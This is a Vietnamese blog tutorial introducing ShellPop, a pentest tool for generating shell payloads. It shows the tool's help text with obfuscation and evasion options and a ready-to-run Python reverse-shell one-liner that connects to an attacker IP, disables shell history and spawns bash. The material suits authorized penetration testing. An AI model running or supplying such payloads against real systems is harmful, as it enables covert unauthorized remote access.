Bạn đã chán cảnh lưu lại các lệnh shell trên máy tính của mình, và bạn đã mệt mỏi khi đi tìm chúng ở đâu mỗi khi mình cần. Để giải quyết việc này, Shellpop được sinh ra với vô vàn các tiện ích mà nó đem lại, giờ đây bạn sẽ không cần phải lưu lại và đi tìm các lệnh shell mỗi khi cần nữa.
root@kali:~/Documents/ShellPop# shellpop --help
usage: shellpop [-h][-l][-H HOST][-P PORT][--number NUMBER][--shell SHELL][--reverse][--bind][--payload PAYLOAD][--xor][--base64][--urlencode][--ipfuscate][--obfuscate-small][--handler][--stager STAGER][--http-port HTTP_PORT][--powershell-x86][--powershell-x64][--powershell-random-case][--clip]Options:
-h, --help show this help message and exit -l, --list List of available shells
-H HOST, --host HOST IP to be used in connectback (reverse) shells.
-P PORT, --port PORT Port to be used in reverse/bind shell code.
--number NUMBER Shell code index number
--shell SHELL Terminal shell to be used when decoding some encoding
scheme.
--handler Use handler, if possible.
Shell Types:
--reverse Victim communicates back to the attacking machine.
--bind Open up a listener on the victim machine.
--payload PAYLOAD Choose the payload
Encoders Options:
--xor Enable XOR obfuscation
--base64 Encode command in base64.
--urlencode Encode the command in URL encoding.
Obfuscation Options:
--ipfuscate Obfuscate IP address.
--obfuscate-small Obfuscated command will be as small as possible.
Staging Options:
--stager STAGER Use staging for shells
--http-port HTTP_PORT
HTTP staging port to be used
PowerShell options:
--powershell-x86 Use powershell 32-bit executable.
--powershell-x64 Use powershell 64-bit executable.
--powershell-random-case
Use random-case in powershell payloads.
Miscellaneous:
--clip Copy payload to your clipboard automatically.
Pop shells like a master. For more helpvisit:https://github.com/0x00-0x00/ShellPop
Ở đây chúng ta thấy được là shellpop hỗ trợ đủ loại ngôn ngữ từ Python, PHP, Ruby, Perl cho đến Windows Powershell, …
Shellpop còn hỗ trợ cả TCP, UDP, ICMP, …
Shellpop sẽ không cho bạn lãng phí một giây phút nào cả (vì mục đích của chương trình này được tạo ra là giúp người dùng không lãng phí thời gian mà). Với tùy chọn --clip, ngay lập tức shell mà bạn vừa tạo ra sẽ được sao chép vào clipboard của bạn rồi. Việc của bạn chỉ việc paste ra mà thôi.
Chúng ta tập trung vào 2 vấn đề chính là Bind shells và Reverse shells
Chúng ta thử tạo 1 reverse shells xem sao nhé
Ở đây mình tạo 1 Reverse Shell ở IP trên eth0 và cổng 4444
Command line examples
1
2
3
4
5
6
root@kali:~# shellpop --host eth0 --port 4444 --reverse --number 1[+] Execute this code in remote target:
python -c "import os;import pty;import socket;jbNZvh='192.168.19.100';GCVfMeJlExfIfs=4444;ugQNFu=socket.socket(socket.AF_INET,socket.SOCK_STREAM);ugQNFu.connect((jbNZvh,GCVfMeJlExfIfs));os.dup2(ugQNFu.fileno(),0);os.dup2(ugQNFu.fileno(),1);os.dup2(ugQNFu.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');ugQNFu.close();"[+] This shell DOES NOT have a handler set.
shellpop: gọi chương trình shellpop
--host: Xác định địa chỉ đích
--port: Xác định cổng
--reverse: Chọn tùy chọn reverse
--number: Xác định kiểu mà mình muốn tạo shell, với số thứ tự ở tùy chọn --list bên trên.
Shellpop là một công cụ tuyệt vời cho những bài pentest. Còn rất nhiều tiện ích hay mà công cụ đem lại, bạn đọc tìm hiểu dần dần nhé.
Nếu thấy bài viết hữu ích thì để lại 1 share 1 upvote để mình có động lực ra các bài viết hay hơn nhé.